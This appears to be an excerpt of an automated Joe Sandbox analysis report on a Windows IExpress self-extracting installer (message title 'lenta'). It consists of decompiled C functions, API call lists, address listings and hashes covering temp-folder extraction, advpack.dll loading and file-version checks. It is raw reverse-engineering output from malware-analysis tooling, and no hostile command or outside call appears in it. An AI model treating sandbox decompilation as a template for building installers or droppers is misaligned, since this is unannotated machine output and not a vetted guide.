                              0x010e3911
                              0x010e3911
                              0x010e3913
                              0x010e394d
                              0x010e394d
                              0x010e394f
                              0x010e38a9
                              0x010e38a9
                              0x010e38b0
                              0x010e38b2
                              0x010e38b9
                              0x010e38bb
                              0x010e38c1
                              0x010e3975
                              0x010e38c7
                              0x010e38de
                              0x010e38e0
                              0x010e38e0
                              0x010e397b
                              0x010e397d
                              0x010e39a9
                              0x010e397f
                              0x010e3982
                              0x010e398b
                              0x010e398d
                              0x010e398f
                              0x010e399f
                              0x010e39a1
                              0x010e3991
                              0x010e3991
                              0x010e3991
                              0x010e398f
                              0x010e39af
                              0x010e39b6
                              0x010e3a0f
                              0x010e3a0f
                              0x010e3a11
                              0x010e3a13
                              0x010e3a19
                              0x00000000
                              0x010e39b8
                              0x010e39b8
                              0x010e39ba
                              0x00000000
                              0x00000000
                              0x010e39bc
                              0x010e39bf
                              0x00000000
                              0x00000000
                              0x010e39c3
                              0x010e39c9
                              0x010e39ce
                              0x010e39d0
                              0x010e39e3
                              0x010e39e5
                              0x010e39e6
                              0x010e39f1
                              0x010e39f7
                              0x010e39fa
                              0x010e3a01
                              0x010e3a04
                              0x00000000
                              0x00000000
                              0x010e3a06
                              0x010e3a09
                              0x010e3a09
                              0x010e3a0b
                              0x010e3a0b
                              0x00000000
                              0x010e3a09
                              0x010e39fc
                              0x00000000
                              0x010e39fc
                              0x010e39d3
                              0x010e39d8
                              0x010e39da
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e39dc
                              0x010e39b6
                              0x010e3955
                              0x010e395b
                              0x00000000
                              0x00000000
                              0x010e3961
                              0x010e3963
                              0x00000000
                              0x00000000
                              0x010e3969
                              0x010e3969
                              0x00000000
                              0x010e3969
                              0x010e3915
                              0x010e3915
                              0x010e391b
                              0x010e391f
                              0x00000000
                              0x00000000
                              0x010e392d
                              0x010e3933
                              0x010e3938
                              0x010e393a
                              0x00000000
                              0x00000000
                              0x010e3940
                              0x010e3946
                              0x010e394b
                              0x00000000
                              0x010e394b
                              0x00000000
                              0x010e38f2
                              0x010e3843
                              0x010e3845
                              0x00000000
                              0x00000000
                              0x010e384b
                              0x010e384d
                              0x010e3883
                              0x010e3885
                              0x00000000
                              0x00000000
                              0x010e389a
                              0x010e389e
                              0x010e389e
                              0x00000000
                              0x00000000
                              0x010e38a0
                              0x010e38a0
                              0x010e38a2
                              0x00000000
                              0x00000000
                              0x010e38a4
                              0x00000000
                              0x010e38a4
                              0x010e384f
                              0x010e3851
                              0x010e3857
                              0x010e386e
                              0x010e3877
                              0x010e387b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3881
                              0x010e3859
                              0x010e385c
                              0x010e3862
                              0x010e3866
                              0x00000000
                              0x00000000
                              0x010e3868
                              0x00000000
                              0x010e38f4
                              0x010e38f4
                              0x010e38f5
                              0x010e38fb
                              0x010e3901
                              0x010e3901
                              0x00000000
                              0x010e390a
                              0x010e374b
                              0x010e374e
                              0x010e375c
                              0x010e3764
                              0x010e3769
                              0x010e376e
                              0x010e3771
                              0x010e379c
                              0x010e379f
                              0x00000000
                              0x00000000
                              0x010e37a3
                              0x010e37a4
                              0x00000000
                              0x010e37a4
                              0x010e3773
                              0x010e3777
                              0x010e3778
                              0x010e377f
                              0x010e3781
                              0x010e378e
                              0x010e378e
                              0x010e3794
                              0x00000000
                              0x010e3794
                              0x010e3783
                              0x00000000
                              0x00000000
                              0x010e3785
                              0x010e378c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e378c
                              0x010e3750
                              0x00000000
                              0x010e372d
                              0x010e372d
                              0x010e396b
                              0x010e396b
                              0x010e396c
                              0x010e396e
                              0x010e396f
                              0x010e3a1e
                              0x010e3a1e
                              0x010e3a22
                              0x010e3a27
                              0x010e3a3e
                              0x010e3a3e

                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010E3723
                              • MessageBeep.USER32(00000000), ref: 010E39C3
                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 010E39F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: 3$lenta
                              • API String ID: 2519184315-4216304122
                              • Opcode ID: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                              • Instruction ID: b86db8c7c02e33c84da4193f86b6d672de55112a3b0a02a6e34a99d572567247
                              • Opcode Fuzzy Hash: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                              • Instruction Fuzzy Hash: 7291B271E012159FEBB98A1BC9887EABFF5BB85704F0941EAC9C99F241D7358D80CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E010E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				signed int _t9;
                              				signed char _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t18;
                              				CHAR* _t26;
                              				void* _t27;
                              				signed int _t28;
                              
                              				_t27 = __esi;
                              				_t18 = __ebx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t28;
                              				_push(__ecx);
                              				E010E1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              				_t26 = "advpack.dll";
                              				E010E658A( &_v268, 0x104, _t26);
                              				_t14 = GetFileAttributesA( &_v268);
                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                              					_t15 = LoadLibraryA(_t26);
                              				} else {
                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                              				}
                              				return E010E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                              			}













                              0x010e6495
                              0x010e6495
                              0x010e64a0
                              0x010e64a7
                              0x010e64ab
                              0x010e64bd
                              0x010e64c2
                              0x010e64d3
                              0x010e64df
                              0x010e64e8
                              0x010e6502
                              0x010e64ee
                              0x010e64f9
                              0x010e64f9
                              0x010e6516

                              APIs
                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E64DF
                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E64F9
                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E6502
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                              • API String ID: 438848745-3680919256
                              • Opcode ID: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                              • Instruction ID: 9f91c51db5aa6aae658b93e98363e502b4d983628b79eeef358e2f9cbdae847c
                              • Opcode Fuzzy Hash: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                              • Instruction Fuzzy Hash: 0401A231A001089FD7A4EB66EC4CAEA77F8EB64710F400199B5C597184DE76AA858B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                              				void* _v8;
                              				char* _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				intOrPtr _v24;
                              				int _v28;
                              				int _v32;
                              				void* _v36;
                              				int _v40;
                              				void* _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				long _t68;
                              				void* _t70;
                              				void* _t73;
                              				void* _t79;
                              				void* _t83;
                              				void* _t87;
                              				void* _t88;
                              				intOrPtr _t93;
                              				intOrPtr _t97;
                              				intOrPtr _t99;
                              				int _t101;
                              				void* _t103;
                              				void* _t106;
                              				void* _t109;
                              				void* _t110;
                              
                              				_v12 = __edx;
                              				_t99 = __ecx;
                              				_t106 = 0;
                              				_v16 = __ecx;
                              				_t87 = 0;
                              				_t103 = 0;
                              				_v20 = 0;
                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                              					L19:
                              					_t106 = 1;
                              				} else {
                              					_t62 = 0;
                              					_v8 = 0;
                              					while(1) {
                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                              						if(E010E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                              							goto L20;
                              						}
                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                              						_v28 = _t68;
                              						if(_t68 == 0) {
                              							_t99 = _v16;
                              							_t70 = _v8 + _t99;
                              							_t93 = _v24;
                              							_t87 = _v20;
                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                              								goto L18;
                              							}
                              						} else {
                              							_t103 = GlobalAlloc(0x42, _t68);
                              							if(_t103 != 0) {
                              								_t73 = GlobalLock(_t103);
                              								_v36 = _t73;
                              								if(_t73 != 0) {
                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                              										L15:
                              										GlobalUnlock(_t103);
                              										_t99 = _v16;
                              										L18:
                              										_t87 = _t87 + 1;
                              										_t62 = _v8 + 0x3c;
                              										_v20 = _t87;
                              										_v8 = _v8 + 0x3c;
                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                              											continue;
                              										} else {
                              											goto L19;
                              										}
                              									} else {
                              										_t79 = _v44;
                              										_t88 = _t106;
                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                              										_t101 = _v28;
                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                              										_t97 = _v48;
                              										_v36 = _t83;
                              										_t109 = _t83;
                              										do {
                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                              											_t109 = _t109 + 0x18;
                              											_t88 = _t88 + 4;
                              										} while (_t88 < 8);
                              										_t87 = _v20;
                              										_t106 = 0;
                              										if(_v56 < 0 || _v64 > 0) {
                              											if(_v52 < _t106 || _v60 > _t106) {
                              												GlobalUnlock(_t103);
                              											} else {
                              												goto L15;
                              											}
                              										} else {
                              											goto L15;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L20;
                              					}
                              				}
                              				L20:
                              				 *_a8 = _t87;
                              				if(_t103 != 0) {
                              					GlobalFree(_t103);
                              				}
                              				return _t106;
                              			}

































                              0x010e28f1
                              0x010e28f4
                              0x010e28f7
                              0x010e28f9
                              0x010e28fc
                              0x010e28ff
                              0x010e2901
                              0x010e2907
                              0x010e2a62
                              0x010e2a64
                              0x010e290d
                              0x010e290d
                              0x010e290f
                              0x010e2912
                              0x010e2920
                              0x010e2937
                              0x00000000
                              0x00000000
                              0x010e2944
                              0x010e294a
                              0x010e294f
                              0x010e2a2f
                              0x010e2a32
                              0x010e2a34
                              0x010e2a37
                              0x010e2a41
                              0x00000000
                              0x00000000
                              0x010e2955
                              0x010e295e
                              0x010e2962
                              0x010e2969
                              0x010e296f
                              0x010e2974
                              0x010e298c
                              0x010e2a20
                              0x010e2a21
                              0x010e2a27
                              0x010e2a4c
                              0x010e2a4f
                              0x010e2a50
                              0x010e2a53
                              0x010e2a56
                              0x010e2a5c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e29b2
                              0x010e29b2
                              0x010e29b5
                              0x010e29bd
                              0x010e29c3
                              0x010e29cc
                              0x010e29d5
                              0x010e29d7
                              0x010e29da
                              0x010e29dd
                              0x010e29df
                              0x010e29ec
                              0x010e29f8
                              0x010e29fc
                              0x010e29ff
                              0x010e2a02
                              0x010e2a07
                              0x010e2a0a
                              0x010e2a0f
                              0x010e2a19
                              0x010e2a81
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e2a0f
                              0x010e298c
                              0x010e2974
                              0x010e2962
                              0x00000000
                              0x010e294f
                              0x010e2912
                              0x010e2a65
                              0x010e2a68
                              0x010e2a6c
                              0x010e2a6f
                              0x010e2a6f
                              0x010e2a7d

                              APIs
                              • GlobalFree.KERNEL32 ref: 010E2A6F
                                • Part of subcall function 010E2773: CharUpperA.USER32(9FDBF5B5,00000000,00000000,00000000), ref: 010E27A8
                                • Part of subcall function 010E2773: CharNextA.USER32(0000054D), ref: 010E27B5
                                • Part of subcall function 010E2773: CharNextA.USER32(00000000), ref: 010E27BC
                                • Part of subcall function 010E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                • Part of subcall function 010E2773: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                • Part of subcall function 010E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                • Part of subcall function 010E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005), ref: 010E2958
                              • GlobalLock.KERNEL32 ref: 010E2969
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005,?), ref: 010E2A21
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010E2A81
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                              • String ID:
                              • API String ID: 3949799724-0
                              • Opcode ID: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                              • Instruction ID: 9e077d0d352446e8b4a0058ce8ea4487db58af8a6c8ba33bf9875b1fce185c9d
                              • Opcode Fuzzy Hash: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                              • Instruction Fuzzy Hash: B3513E31E00219DFDB25DF9AC888AAEFBF9FF48700F18416AE995E7211D7359941CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 32%
                              			E010E4169(void* __eflags) {
                              				int _t18;
                              				void* _t21;
                              
                              				_t20 = E010E468F("FINISHMSG", 0, 0);
                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                              				if(_t21 != 0) {
                              					if(E010E468F("FINISHMSG", _t21, _t20) != 0) {
                              						if(lstrcmpA(_t21, "<None>") == 0) {
                              							L7:
                              							return LocalFree(_t21);
                              						}
                              						_push(0);
                              						_push(0x40);
                              						_push(0);
                              						_push(_t21);
                              						_t18 = 0x3e9;
                              						L6:
                              						E010E44B9(0, _t18);
                              						goto L7;
                              					}
                              					_push(0);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_t18 = 0x4b1;
                              					goto L6;
                              				}
                              				return E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              			}





                              0x010e417d
                              0x010e418f
                              0x010e4193
                              0x010e41b7
                              0x010e41d3
                              0x010e41e6
                              0x00000000
                              0x010e41e7
                              0x010e41d5
                              0x010e41d6
                              0x010e41d8
                              0x010e41d9
                              0x010e41da
                              0x010e41df
                              0x010e41e1
                              0x00000000
                              0x010e41e1
                              0x010e41b9
                              0x010e41ba
                              0x010e41bc
                              0x010e41bd
                              0x010e41be
                              0x00000000
                              0x010e41be
                              0x00000000

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E4189
                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E41E7
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$FINISHMSG
                              • API String ID: 3507850446-3091758298
                              • Opcode ID: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                              • Instruction ID: 60e6e793b66560f2ac8dcf9c844decc26569ee38ba34352c021fb904f5b26d76
                              • Opcode Fuzzy Hash: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                              • Instruction Fuzzy Hash: 2F01ADB1700215BFF7291A6B8C8DFBB65CEDBD8A95F0040A9B785E61849AB9CC0141B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                              				signed int _v8;
                              				char _v520;
                              				void* __esi;
                              				signed int _t11;
                              				void* _t14;
                              				void* _t23;
                              				void* _t27;
                              				void* _t33;
                              				struct HWND__* _t34;
                              				signed int _t35;
                              
                              				_t33 = __edi;
                              				_t27 = __ebx;
                              				_t11 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t11 ^ _t35;
                              				_t34 = _a4;
                              				_t14 = _a8 - 0x110;
                              				if(_t14 == 0) {
                              					_t32 = GetDesktopWindow();
                              					E010E43D0(_t34, _t15);
                              					_v520 = 0;
                              					LoadStringA( *0x10e9a3c, _a16,  &_v520, 0x200);
                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                              					MessageBeep(0xffffffff);
                              					goto L6;
                              				} else {
                              					if(_t14 != 1) {
                              						L4:
                              						_t23 = 0;
                              					} else {
                              						_t32 = _a12;
                              						if(_t32 - 0x83d > 1) {
                              							goto L4;
                              						} else {
                              							EndDialog(_t34, _t32);
                              							L6:
                              							_t23 = 1;
                              						}
                              					}
                              				}
                              				return E010E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}













                              0x010e19e0
                              0x010e19e0
                              0x010e19eb
                              0x010e19f2
                              0x010e19f9
                              0x010e19fc
                              0x010e1a01
                              0x010e1a2a
                              0x010e1a2e
                              0x010e1a3e
                              0x010e1a4f
                              0x010e1a62
                              0x010e1a6a
                              0x00000000
                              0x010e1a03
                              0x010e1a06
                              0x010e1a20
                              0x010e1a20
                              0x010e1a08
                              0x010e1a08
                              0x010e1a14
                              0x00000000
                              0x010e1a16
                              0x010e1a18
                              0x010e1a70
                              0x010e1a72
                              0x010e1a72
                              0x010e1a14
                              0x010e1a06
                              0x010e1a81

                              APIs
                              • EndDialog.USER32(?,?), ref: 010E1A18
                              • GetDesktopWindow.USER32 ref: 010E1A24
                              • LoadStringA.USER32(?,?,00000200), ref: 010E1A4F
                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010E1A62
                              • MessageBeep.USER32(000000FF), ref: 010E1A6A
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              • Opcode ID: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                              • Instruction ID: 19918536b8c2bbdeadd579b83861d6b53a2ed2d64767a52f395f8c51cc3c88a7
                              • Opcode Fuzzy Hash: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                              • Instruction Fuzzy Hash: 4411A131600109EFDB20EF69EA0CABE7BF8EF49750F048195E992DB184DA359E11CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E010E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                              				signed int _v8;
                              				char _v268;
                              				long _v272;
                              				void* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t15;
                              				long _t28;
                              				struct _OVERLAPPED* _t37;
                              				void* _t39;
                              				signed int _t40;
                              
                              				_t15 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t15 ^ _t40;
                              				_v272 = _v272 & 0x00000000;
                              				_push(__ecx);
                              				_v276 = _a16;
                              				_t37 = 1;
                              				E010E1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              				E010E658A( &_v268, 0x104, _a12);
                              				_t28 = 0;
                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                              				if(_t39 != 0xffffffff) {
                              					_t28 = _a4;
                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                              						 *0x10e9124 = 0x80070052;
                              						_t37 = 0;
                              					}
                              					CloseHandle(_t39);
                              				} else {
                              					 *0x10e9124 = 0x80070052;
                              					_t37 = 0;
                              				}
                              				return E010E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                              			}















                              0x010e63cb
                              0x010e63d2
                              0x010e63d8
                              0x010e63ea
                              0x010e63f3
                              0x010e6401
                              0x010e6402
                              0x010e6410
                              0x010e6415
                              0x010e6433
                              0x010e6438
                              0x010e6449
                              0x010e6463
                              0x010e646d
                              0x010e6477
                              0x010e6477
                              0x010e647a
                              0x010e643a
                              0x010e643a
                              0x010e6444
                              0x010e6444
                              0x010e6492

                              APIs
                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E642D
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E645B
                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E647A
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010E63EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1065093856-305352358
                              • Opcode ID: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                              • Instruction ID: e86f7c3869ed5baef272ef4edcfaf9363a92032aef5c215ba45568d8ee1add8b
                              • Opcode Fuzzy Hash: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                              • Instruction Fuzzy Hash: 6C21C3B1A00218AFD720DF26EC88FEA77E8EB59714F0041A9B5C5A7240DAB59D848F64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E47E0(intOrPtr* __ecx) {
                              				intOrPtr _t6;
                              				intOrPtr _t9;
                              				void* _t11;
                              				void* _t19;
                              				intOrPtr* _t22;
                              				void _t24;
                              				struct HWND__* _t25;
                              				struct HWND__* _t26;
                              				void* _t27;
                              				intOrPtr* _t28;
                              				intOrPtr* _t33;
                              				void* _t34;
                              
                              				_t33 = __ecx;
                              				_t34 = LocalAlloc(0x40, 8);
                              				if(_t34 != 0) {
                              					_t22 = _t33;
                              					_t27 = _t22 + 1;
                              					do {
                              						_t6 =  *_t22;
                              						_t22 = _t22 + 1;
                              					} while (_t6 != 0);
                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                              					 *_t34 = _t24;
                              					if(_t24 != 0) {
                              						_t28 = _t33;
                              						_t19 = _t28 + 1;
                              						do {
                              							_t9 =  *_t28;
                              							_t28 = _t28 + 1;
                              						} while (_t9 != 0);
                              						E010E1680(_t24, _t28 - _t19 + 1, _t33);
                              						_t11 =  *0x10e91e0; // 0x34b71c0
                              						 *(_t34 + 4) = _t11;
                              						 *0x10e91e0 = _t34;
                              						return 1;
                              					}
                              					_t25 =  *0x10e8584; // 0x0
                              					E010E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                              					LocalFree(_t34);
                              					L2:
                              					return 0;
                              				}
                              				_t26 =  *0x10e8584; // 0x0
                              				E010E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                              				goto L2;
                              			}















                              0x010e47e8
                              0x010e47f0
                              0x010e47f4
                              0x010e480f
                              0x010e4811
                              0x010e4814
                              0x010e4814
                              0x010e4816
                              0x010e4817
                              0x010e4829
                              0x010e482b
                              0x010e482f
                              0x010e484f
                              0x010e4852
                              0x010e4855
